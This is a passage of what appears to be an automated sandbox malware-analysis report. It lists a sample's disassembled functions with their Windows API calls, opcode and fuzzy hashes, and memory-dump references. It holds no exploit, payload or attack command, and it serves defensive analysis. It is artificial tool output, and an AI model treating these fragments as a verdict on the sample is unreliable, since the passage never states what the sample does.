                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                                                                                          • Opcode ID: 4da7b5c45104602c3d73bdd28435667f67d5cea40458e18e146b9992abc70f6c
                                                                                                                                                                                                                                          • Instruction ID: 6fac107bf4662ea0c7a005609b2672bc951a39e3d351abcacfe50816f1fa1005
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4da7b5c45104602c3d73bdd28435667f67d5cea40458e18e146b9992abc70f6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B415C71900205EFDF15EF55DC85AAA7778FF08310F1440A9EE04AA2A7DB70EE65DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0012F3AB,00000000,?,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0016824C
                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00168272
                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001682D1
                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 001682E5
                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 0016830B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0016832F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                                                                                          • Opcode ID: 6823c21565c3bc3a03d1173cb114ee316bf70fe245cfb25d707f8818d8e1ba80
                                                                                                                                                                                                                                          • Instruction ID: 4ca3b21c3c7d7686097c8540699bffe32fd34f9a5e7db9a1543a68ecf3649ab5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6823c21565c3bc3a03d1173cb114ee316bf70fe245cfb25d707f8818d8e1ba80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1941C230601644AFDB21CF15CCA9BF57BF1FB0A715F1843ADE5484B2A2CB71A8A1CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00134C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00134C95
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00134CB2
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00134CEA
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00134D08
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00134D10
                                                                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00134D1A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                                                                                          • Opcode ID: 9578aaff040b31402004872745dae3952a85c13da04b734c656b96b34ab289d1
                                                                                                                                                                                                                                          • Instruction ID: 85989f34ffa79d39a04e2359aa1262a747cb85000c6fa31fc93904f680a4411a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9578aaff040b31402004872745dae3952a85c13da04b734c656b96b34ab289d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF213872204201BBEB155B79EC09EBB7B9CDF55750F108039F805DA292EFA1EC4096A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014587B
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00145995
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0016FCF8,00000000,00000001,0016FB68,?), ref: 001459AE
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001459CC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                          • Opcode ID: 5c559e1fb26c98590652fd017921439f3aad75bf7337e829c5b886d07394d047
                                                                                                                                                                                                                                          • Instruction ID: c89d2af26ec3ad9fd85b307d4c03bb60604b32143af15369f152fc402b71a4cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c559e1fb26c98590652fd017921439f3aad75bf7337e829c5b886d07394d047
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EED14271608701DFC714DF24C480A6ABBE6EF89714F14895EF8899B362DB31ED45CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00130FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00130FCA
                                                                                                                                                                                                                                            • Part of subcall function 00130FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00130FD6
                                                                                                                                                                                                                                            • Part of subcall function 00130FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00130FE5
                                                                                                                                                                                                                                            • Part of subcall function 00130FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00130FEC
                                                                                                                                                                                                                                            • Part of subcall function 00130FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00131002
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00131335), ref: 001317AE
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001317BA
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 001317C1
                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 001317DA
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00131335), ref: 001317EE
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001317F5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                                                                                          • Opcode ID: b454f9b7de8361f45905443a267f2d31839bdbf20f731e38413543a0a5c45351
                                                                                                                                                                                                                                          • Instruction ID: 4576aedd2fd271fd1c81db933b8e6b978d206565afee0ce56bcd4b23886bab79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b454f9b7de8361f45905443a267f2d31839bdbf20f731e38413543a0a5c45351
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6118B32601605FFDB249FA4CC49BBE7BA9EB46359F184018F485A7210D776A984CBB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001314FF
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00131506
                                                                                                                                                                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00131515
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00131520
                                                                                                                                                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013154F
                                                                                                                                                                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00131563
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1413079979-0
                                                                                                                                                                                                                                          • Opcode ID: 77ca49bdda53c0bce4a869b0722582b58045f113e4594f07394f80cdc81e5bd0
                                                                                                                                                                                                                                          • Instruction ID: d34b9006cc0a472c7fab76c20554433cc62bdad236648ae4f9c3ea6f9e20f149
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77ca49bdda53c0bce4a869b0722582b58045f113e4594f07394f80cdc81e5bd0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32115672500209FBDF118FA8ED49BEE7BA9EF49744F044025FA05A2160C3B18EA0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000F3379,000F2FE5), ref: 000F3390
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F339E
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F33B7
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,000F3379,000F2FE5), ref: 000F3409
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                          • Opcode ID: 64f19afc18ef194067586575b4b901d9a7205c1879a11e048675d3ace3f4fa73
                                                                                                                                                                                                                                          • Instruction ID: 328137c21d2c3def8a3c61e3e8d1b6926d48d286e8b50d6b011ef70e88bf9c9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64f19afc18ef194067586575b4b901d9a7205c1879a11e048675d3ace3f4fa73
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E014733608319BEEA2927747C85ABB2AD4EB05379B20422AF710C0EF1EF515E517184
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00102D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00105686,00113CD6,?,00000000,?,00105B6A,?,?,?,?,?,000FE6D1,?,00198A48), ref: 00102D78
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102DAB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102DD3
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,000FE6D1,?,00198A48,00000010,000D4F4A,?,?,00000000,00113CD6), ref: 00102DE0
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,000FE6D1,?,00198A48,00000010,000D4F4A,?,?,00000000,00113CD6), ref: 00102DEC
                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00102DF2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                          • Opcode ID: a29b4bf8c7cde70e1d7b081f961b08a6df57170f74a83bdbb4637a3b766d29dc
                                                                                                                                                                                                                                          • Instruction ID: 408d929764aadee6984f5f64fbe12b8d625f085b59cd2bac8e71818c822b4ae6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29b4bf8c7cde70e1d7b081f961b08a6df57170f74a83bdbb4637a3b766d29dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF0C83650460067C61237B4BC0EE2A265DBFD27A5F354419F8E4936E2EFF48C4153A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00168A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96A2
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: BeginPath.GDI32(?), ref: 000E96B9
                                                                                                                                                                                                                                            • Part of subcall function 000E9639: SelectObject.GDI32(?,00000000), ref: 000E96E2
                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00168A4E
                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00168A62
                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00168A70
                                                                                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00168A80
                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 00168A90
                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 00168AA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                                                                          • Opcode ID: 4f5a59870be28bafa749f723a475783d125791d28bf9d164b1eb2ae1716987a0
                                                                                                                                                                                                                                          • Instruction ID: 49902350279f035f1d18b93c7ab999b12071d3addec04ee7a482e80efe7a6682
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f5a59870be28bafa749f723a475783d125791d28bf9d164b1eb2ae1716987a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97110976000108FFDF129F94DC88EAA7F6CEB08394F008012FA599A5A1C7719D95DFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00135218
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00135229
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00135230
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00135238
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0013524F
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00135261
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                                                                          • Opcode ID: 4ba4d41ff29e2327f9f1eedca5eec4a68bc09d62c283611db1f73d269b02f052
                                                                                                                                                                                                                                          • Instruction ID: bf91d8c646cdc608b023ed8594c0cf88923108b0625dce26283d1970227b3287
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ba4d41ff29e2327f9f1eedca5eec4a68bc09d62c283611db1f73d269b02f052
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5014F76A01718BBEB109BA59C49A5EBFB9EB48751F044066FA45A7681D6B09800CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D1BF4
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 000D1BFC
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D1C07
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D1C12
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 000D1C1A
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 000D1C22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                                                                          • Opcode ID: fece839023fef96f70bb6d957d938be333cfc22ef22fae836388e8f9e0049c53
                                                                                                                                                                                                                                          • Instruction ID: 16ade4774dbe5ac2dacc465f6d4cbf9e51dc8033d108a6348e7a7de42227e54d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fece839023fef96f70bb6d957d938be333cfc22ef22fae836388e8f9e0049c53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BD15C47A41C7F5A864CBE5
                                                                                                                                                                                                                                          Uniqueness

